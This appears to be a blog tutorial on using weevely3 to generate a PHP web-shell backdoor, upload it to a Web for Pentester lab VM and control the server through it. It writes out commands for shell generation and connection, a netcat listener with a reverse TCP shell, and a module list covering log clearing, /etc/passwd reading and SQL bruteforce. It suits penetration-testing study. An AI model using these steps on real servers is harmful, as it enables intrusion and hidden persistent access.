weevely : PHP Web-shell Generation tool | How to use weevely3 to generate PHP Backdoor

Weevely is a command line tool used to generate web shells, and it also provide clean command line environment to execute code on target server after uploading the shell.

With weevely terminal we can execute arbitrary code through uploaded php shell on the target web server. It also provide more than 40 modules to assist administrative tasks, maintain access, provide situational awareness, elevate privileges, and spread into the target server.

Some of the main features of weevely are :
  • Ssh-like terminal
  • Shell access to the target
  • SQL console pivoting on the target
  • HTTP/HTTPS proxy to browse through the target
  • Host configuration security auditing
  • Upload and download files
  • Spawn reverse and direct TCP shells
  • Audit remote target security
  • Run Meterpreter payloads
  • Port scan pivoting on target
  • Mount the remote filesystem
  • Reverse and direct TCP shell
  • Bruteforce SQL accounts pivoting on the target
  • Meterpreter support
  • Service account bruteforce
  • Compressed archive management

Installation process of weevely :

In Linux based systems ( Ubuntu/Debian ):

Installing the dependencies :
 sudo apt-get install g++ python2.7 python-pip libyaml-dev python-dev libncurses5-dev
Or you can also install dependencies with python pip. First go inside weevely3 directory
 cd weevely3
And type below command :
 sudo pip install -r requirements.txt --upgrade
Usage : To generate php webshell/backdoor, the command will be :
 ./weevely.py generate <password> <file_name>
  • password is used to connect back to webshell on the target server. 
  • file_name is name of the webshell/backdoor file.
Example :
 ./weevely.py generate 12345 shell.php
Above command will generate webshell named shell.php.

Now lets upload the webshell file for futher demonstration, for this i am goping to use Web for Pentester VM. To setup the testlab with Web4Pentester Please visit the below link :


First we have to upload the webshell on the target server.

Now to connect  to the webshell through weevely, use the below command :
 ./weevely <URL> <password>
Where : "URL" menas full url of webshell on the web server, which is in our case :


"password" is password which we gives at the time of webshell creation, which is 12345

Now lets try to connect to the webshell,
 ./weevely.py 12345

and as we can see, we are successfully connected to the target web server via the webshell. It gives the remote shell, through which we can run shell command on the server, for example :
 weevely> ls
 www-data@debian:/var/www/upload/images $ uname -a
 Linux debian 2.6.32-5-686 #1 SMP Fri May 10 08:33:48 UTC 2013 i686 GNU/Linux
 www-data@debian:/var/www/upload/images $ ls
 www-data@debian:/var/www/upload/images $ pwd
 www-data@debian:/var/www/upload/images $

Running the extension Modules :

Currently there are more than 40 modules are available to use in weevely. To use them we just need to type below command on remote shell
For example :
the system_info module collect system information.

To get the full list of available module type :
 Module                     Description
:audit_filesystem           | Audit the file system for weak permissions.
:audit_suidsgid             |  Find files with SUID or SGID flags.
:audit_disablefunctionbypass|  Bypass disable_function restrictions with mod_cgi and .htaccess.
:audit_etcpasswd            |  Read /etc/passwd with different techniques.
:audit_phpconf              |  Audit PHP configuration.
:shell_sh                   |  Execute shell commands.
:shell_su                   |  Execute commands with su.
:shell_php                  |  Execute PHP commands.
:system_extensions          |  Collect PHP and webserver extension list.
:system_info                |  Collect system information.
:system_procs               |  List running processes.
:backdoor_reversetcp        |  Execute a reverse TCP shell.
:backdoor_tcp               |  Spawn a shell on a TCP port.
:backdoor_meterpreter       |  Start a meterpreter session.
:bruteforce_sql             |  Bruteforce SQL database.
:file_gzip                  |  Compress or expand gzip files.
:file_clearlog              |  Remove string from a file.
:file_check                 |  Get attributes and permissions of a file.
:file_upload                |  Upload file to remote filesystem.
:file_webdownload           |  Download an URL.
:file_tar                   |  Compress or expand tar archives.
:file_download              |  Download file from remote filesystem.
:file_bzip2                 |  Compress or expand bzip2 files.
:file_edit                  |  Edit remote file on a local editor.
:file_grep                  |  Print lines matching a pattern in multiple files.
:file_ls                    |  List directory content.
:file_cp                    |  Copy single file.
:file_rm                    |  Remove remote file.
:file_upload2web            |  Upload file automatically to a web folder and get corresponding URL.
:file_zip                   |  Compress or expand zip files.
:file_touch                 |  Change file timestamp.
:file_find                  |  Find files with given names and attributes.
:file_mount                 |  Mount remote filesystem using HTTPfs.
:file_enum                  |  Check existence and permissions of a list of paths.
:file_read                  |  Read remote file from the remote filesystem.
:file_cd                    |  Change current working directory.
:sql_console                |  Execute SQL query or run console.
:sql_dump                   |  Multi dbms mysqldump replacement.
:net_mail                   |  Send mail.
:net_phpproxy               |  Install PHP proxy on the target.
:net_curl                   |  Perform a curl-like HTTP request.
:net_proxy                  |  Run local proxy to pivot HTTP/HTTPS browsing through the target.
:net_scan                   |  TCP Port scan.
:net_ifconfig               |  Get network interfaces addresses.
To get help page for modules, type below command :
 :<module_name> -h
Example :
 :system_info -h
Now lets test some more modules :

:file_download - Used to download file from remote server.

:file_upload - Used to upload file to remote server.

:file_read - Used to read files from remote server.

:backdoor_reversetcp - Execute a reverse TCP shell. First start netcat listener on your local machine by :
 nc -lv 9001

Now the TCP listener is started on port 9001, then type the below command on weevely terminal :
 :backdoor_reversetcp 9001
where is ip of local machine. after some moment we get the reverse shell.

:net_ifconfig - Get the network interfaces addresses.

Conclusion :

weevely is a very powerful tool to get remote shell on the web servsvers, and in order to exploit file upload vulnerability.

Visit the link for more tutorials about Web Security : http://www.sec-art.net/p/web-security.html